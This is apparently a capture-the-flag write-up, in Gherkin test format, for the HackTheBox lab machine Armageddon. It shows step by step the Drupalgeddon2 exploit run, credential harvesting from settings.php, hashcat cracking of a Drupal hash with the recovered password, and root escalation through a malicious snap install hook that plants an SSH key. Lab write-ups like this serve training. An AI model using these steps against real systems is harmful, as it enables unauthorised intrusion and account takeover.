## Version 2.0
## language: en

Feature: armageddon-HackTheBox

  Site:
    www.hackthebox.eu
  User:
    thecyberpunker
  Goal:
    Get user system own

 Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Parrot OS       | 4.11      |
    | Google Chrome   | 89.0.4    |
    | Wappalyzer      | 6.5.31    |
    | Nmap            | 7.9.1     |
    | Vmware 16 pro   | 16.1.0    |
    | Ubuntu          | 20.4.2.0  |
    | Searchsploit    | 4.1.3     |
    | Google Chrome   | 89.0.4    |
    | Ruby            | 2.7.2p137 |
    | OpenSSH         | 8.4p1     |

  Machine information:
    Given I am accessing the challenge through the URL
    """
    https://app.hackthebox.eu/machines/Armageddon
    """
    When I visit the IP address 10.10.10.233 [evidence](print1.png)
    Then I see a website with a login form
    And I scan with Wappalyzer
    And I get information about the website [evidence](print2.png)

  Scenario: Success: Exploit the website
    Given I have some information about the website
    When I verify the running services with a nmap command
    """
    nmap -sT -sV -sC -Pn -v -oA enum 10.10.10.233
    """
    Then I get some information showing [evidence](print3.png)
    And I realize that are two open ports
    """
    80/tcp open http Apache httpd 2.4.6 (CentOS) (PHP/5.4.16)
    http-generator Drupal 7
    22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
    """
    When I search for a exploit for Drupal 7 with Searchsploit
    """
    searchsploit Drupal 7.0
    """
    And I realize about an existing exploit [evidence](print4.png)
    And I search for this exploit in GitHub and I clone it
    """
    git clone https://github.com/dreadlocked/Drupalgeddon2
    """
    When I use agains the target [evidence](print5.png)
    """
    ruby drupalgeddon2.rb http://10.10.10.233
    """
    And I got shell access
    When I try to check permissions list
    """
    ls -la sites/default
    """
    And I see the files in the directory [evidence](print6.png)
    Then I see the "-r--r--r--" permissions file
    And I try to read the "settings" file
    """
    cat sites/default/settings.php
    """
    And I get some credentials [evidence](print7.png)
    And I realize that the reference is for a Mysql database
    When I try to connect to the database with the credentials
    And I got access to the database [evidence](print8.png)
    Then I start to navigate into the users table from the database
    And I got some an user hash [evidence](print9.png)
    Then I scan the hash in "onlinehashcrack.com" [evidence](print10.png)
    And I see that the ouput for the hash is "Drupal v7.x"
    And I search for the hash code "7900 for Drupal 7" [evidence](print11.png)
    Then I try to crack it [evidence](print12.png)
    """
    hashcat -m 7900 drupal7hash /usr/share/wordlists/rockyou.txt
    """
    And I got the password for the hash [evidence](print13.png)
    """
    $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
    """
    Then I try to test the password using the ssh port
    """
    ssh brucetherealadmin@10.10.10.233
    """
    And I got access to ssh user [evidence](print14.png)
    Then I check it with command "ls -la" [evidence](print15.png)
    And I can see the file "user.txt"
    When I read the file
    """
    cat user.txt
    """
    And I got the first flag for the user [evidence](print16.png)

  Scenario: Success: Try dirty_sock Local Privilege Escalation
    Given I got user access
    When I try in the same ssh session the following command "sudo --list"
    And I see a console message
    """
    sudo --list
    (root) NOPASSWD: /usr/bin/snap install
    """
    And I realize that I can perform privilege escalation
    And I see The Ubuntu Package Manager "Snap" [evidence](print17.png)
    Then I found an exploit that requires Ubuntu [evidence](print18.png)
    """
    dirty_sock Privilege Escalation https://www.exploit-db.com/exploits/46362
    """
    And I run Ubuntu in a VM to perform the exploit [evidence](print19.png)
    Then I install Snapcraft on Ubuntu
    """
    sudo apt install snapcraft
    """
    And I make some directories and files for the vulnerable Snap file
    """
    mkdir cyberpunker_snap
    cd *
    snapcraft init // create the file .yaml
    mkdir snap/hooks
    touch snap/hooks/install
    chmod a+x snap/hooks/install
    """
    Then I make a script for "snap/hooks/install" file
    """
    nano snap/hooks/install
    #!/bin/bash
    mkdir /root/.ssh &&
    cat /home/brucetherealadmin/id_rsa.pub >> /root/.ssh/autorized_keys
    """
    And I configure the ".yaml" file
    """
    nano snap/snapcraft.yaml
    name:dirty-sock
    version: '0.1'
    summary: Empty snap, used to exploit
    description:|
    see https://github.com/initstring/dirty_sock
    grade:level
    confinement: devmode
    parts:
    my-part:
    plugin:nil
    """
    Then I use Snapcraft command "snapcraft" [evidence](print20.png)
    And I move the "rsa_pub.key" and the "dirty-sock" file to the ssh session
    """
    scp example-file1 brucetherealadmin@10.10.10.233:/home/brucetherealadmin
    """
    And I install the file [evidence](print21.png)
    Then I try to login as root [evidence](print22.png)
    And I list all the files on the root session [evidence](print-23png)
    When I read the "root.txt" file
    And I get the Root flag [evidence](print-24.png)
    And I get the validation on Hackthebox [evidence](print-25.png)
